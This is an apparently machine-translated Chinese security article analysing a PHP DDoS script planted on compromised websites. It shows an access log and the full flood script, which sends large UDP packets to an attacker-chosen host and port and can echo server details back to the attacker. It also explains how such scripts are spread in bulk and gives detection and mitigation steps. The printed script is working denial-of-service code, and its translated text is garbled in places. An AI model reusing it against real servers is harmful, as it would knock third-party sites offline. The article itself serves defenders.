Malicious DDOS script Log Analysis Report

Www.2cto.com: This site has spent a lot of time studying the phpddos problem and published some research results. However, no perfect solution was found, including the conventional method provided in this article, which seriously affected website programs, especially dz and collection classes.

There have been a lot of feedback from the website recently. an IP address keeps requesting a script file on the website (in this example, It is diy. php), generates a large number of access requests to other websites. After a security team contacts the user, the source code of the access log and script is as follows:
Access log:
199.36.74.138--[29/Jul/2012: 00: 48: 00 + 0800] "GET/include/diy. php? Host = 76.10.221.209 & port = 6005 & time = 60 HTTP/1.1 "200 1371
Php ddos script:
<? Php
Set_time_limit (999999 );
$ Host = $ _ GET ['host'];
$ Port = $ _ GET ['Port'];
$ Exec_time = $ _ GET ['time'];
$ Sendlen = 65535;
$ Packets = 0;
Ignore_user_abort (True );
If (StrLen ($ host) = 0 or StrLen ($ port) = 0 or StrLen ($ exec_time) = 0 ){
If (StrLen ($ _ GET ['rat ']) <--------> 0 ){
Echo $ _ GET ['rat ']. $ _ SERVER ["HTTP_HOST"]. "| ". getHostByName ($ _ SERVER ['server _ name']). "| ". php_uname (). "| ". $ _ SERVER ['server _ soft']. $ _ GET ['rat '];
Exit;
}
Echo "Parameters can not be empty! ";
Exit;
}
For ($ I = 0; $ I & lt; $ Sendlen; $ I ++ ){
$ Out. = "";
}
$ Max_time = time () + $ exec_time;
Echo "maximum attack time:". $ max_time ."
";
Echo "target IP Address:". $ host ."
";
Echo "attack Port:". $ host ."
";
While (1 ){
$ Packets ++;
If (time () & gt; $ max_time ){
Break;
}
$ Fp = fsockopen ("udp: // $ host", $ port, $ errno, $ errstr, 5 );
If ($ fp ){
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}
Echo "Send Host: $ host: $ port
 
";
Echo "Send Flow: $ packets * ($ sendlen/ 1024 = ". round ($ Sendlen/1024, 2 ). ") kb/1024 = ". round ($ packets * $ Sendlen/1024/1024, 2 ). "mb
 
";
Echo "Send Rate :". round ($ packets/$ exec_time, 2 ). "packs/s ;". round ($ packets/$ exec_time * $ Sendlen/1024/1024, 2 ). "mb/s ";
 
?>
The script uses the GET method to obtain the host, port, and time parameters, and defines the size of the sent data packet as 65535. The final constructed data packet is 65535 "", then, call the fsockopen function: fsockopen ("udp: // $ host", $ port, $ errno, $ errstr, 5 );, malicious data packets are sent to the target port of the target website using UDP protocol. DOS attacks are initiated on the website server as the source, which consumes a large amount of website traffic and occupies network bandwidth, leading to website failure to access normally.
After testing, the average data packets sent by the above scripts per minute can reach more than 40 W, which is highly lethal to normal WebSite Services. According to statistics on website applications under malicious DDOS script attacks, most websites use dedecms and phpcms as website applications, which may be related to previous CMS vulnerabilities.
This type of attack is similar to the mass SQL injection attack that has been prevalent in the past few years: that is, through a known web Application Security Vulnerability (such as SQL injection), combined with a search engine, A large number of websites with this vulnerability can be found to achieve a fully automated attack process:
Web application vulnerabilities discovered
1. web application vulnerabilities discovered
2. Search Engines search for websites with vulnerabilities (websites using this web Application)
3. Attack all websites in batches with crawlers
4. Batch upload of malicious files
5. Initiate DOS attacks in batches
6. the hacker's master monitors and maintains the list of attacked websites.
Through the above steps, hackers can easily achieve large-scale malicious attacks with a purpose, in batches, and intelligence.
Solutions for malicious DOS script Attacks:
1. check whether all files on the website are maliciously called by the fsockopen function, or run the "udp: //" keyword grep to check all files on the website and check whether malicious DOS scripts are implanted.
2. Modify php. ini, set disable_function: fsockopen, and disable the fsockopen function.
3. Install the latest security patches for open-source website applications.